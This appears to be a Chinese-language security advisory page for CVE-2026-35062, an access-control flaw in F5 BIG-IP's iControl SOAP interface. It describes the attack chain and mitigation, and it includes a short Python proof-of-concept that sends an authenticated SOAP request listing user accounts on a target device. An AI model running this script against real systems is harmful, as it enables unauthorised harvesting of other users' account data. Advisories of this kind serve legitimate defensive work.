IPBUF安全漏洞报告
English
CVE-2026-35062 CVSS 6.5 中危

CVE-2026-35062 F5 BIG-IP iControl SOAP信息泄露漏洞

披露日期: 2026-05-13

漏洞信息

漏洞编号
CVE-2026-35062
漏洞类型
信息泄露
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
F5 BIG-IP

相关标签

Information DisclosureF5 BIG-IPiControl SOAP权限绕过

漏洞概述

CVE-2026-35062 是 F5 BIG-IP 产品中的一个安全漏洞。该漏洞源于 iControl SOAP 接口的权限验证逻辑缺陷。由于未达到技术支持终止(EoTS)的软件版本受到影响,具有低权限的攻击者可以通过 iControl SOAP 接口获取其他账户的敏感信息。此漏洞可能导致用户数据泄露,增加横向移动风险。

技术细节

该漏洞位于 F5 BIG-IP 的 iControl SOAP 接口中,这是一个用于远程管理和配置的 API。漏洞的根本原因在于接口在处理特定请求时,未正确实施对象级别的访问控制(IDOR)。攻击者首先需要拥有一个经过认证的低权限账户。利用该漏洞时,攻击者向受影响设备发送特制的 SOAP 请求,试图访问其他用户的账户信息。由于系统仅验证了 SOAP 请求的会话有效性,而未验证请求主体是否有权访问目标账户数据,导致攻击者能够绕过权限检查,成功获取其他账户的详细信息,包括用户名、权限配置等敏感数据。

攻击链分析

STEP 1
侦察与访问
攻击者发现目标 F5 BIG-IP 设备,并获取一个低权限的 iControl SOAP 接口账户凭证。
STEP 2
漏洞利用
攻击者使用低权限凭证构造特制的 SOAP 请求,调用用户管理接口。
STEP 3
权限绕过
由于存在访问控制缺陷,设备响应请求并返回了系统中其他受保护账户的信息。
STEP 4
信息获取
攻击者解析响应数据,获取到管理员或其他用户的敏感信息,为进一步攻击做准备。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests from requests.auth import HTTPBasicAuth # CVE-2026-35062 PoC Concept # Target: F5 BIG-IP iControl SOAP Interface # Description: Attempts to retrieve user information using authenticated low-privilege session. target_url = "https://<TARGET_IP>:443/iControl/iControlPortal" username = "low_priv_user" password = "password" # SOAP payload to list all users (potentially exposing other accounts) soap_payload = '''<?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Body> <m:get_list xmlns:m="urn:iControl:Management/UserManagement"> </m:get_list> </SOAP-ENV:Body> </SOAP-ENV:Envelope>''' headers = { 'Content-Type': 'text/xml; charset=utf-8', 'SOAPAction': 'urn:iControl:Management/UserManagement' } try: # Sending the request with authentication response = requests.post(target_url, data=soap_payload, headers=headers, auth=HTTPBasicAuth(username, password), verify=False) if response.status_code == 200: print("[+] Request successful. Check response for user data leakage.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

影响范围

F5 BIG-IP (具体受影响版本请参考厂商公告 K000159021)

防御指南

临时缓解措施
建议立即限制 iControl SOAP 接口的网络访问权限,仅允许受信任的管理主机 IP 连接。如果不需要使用 SOAP 接口,可考虑暂时禁用该服务,直至应用官方安全补丁。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表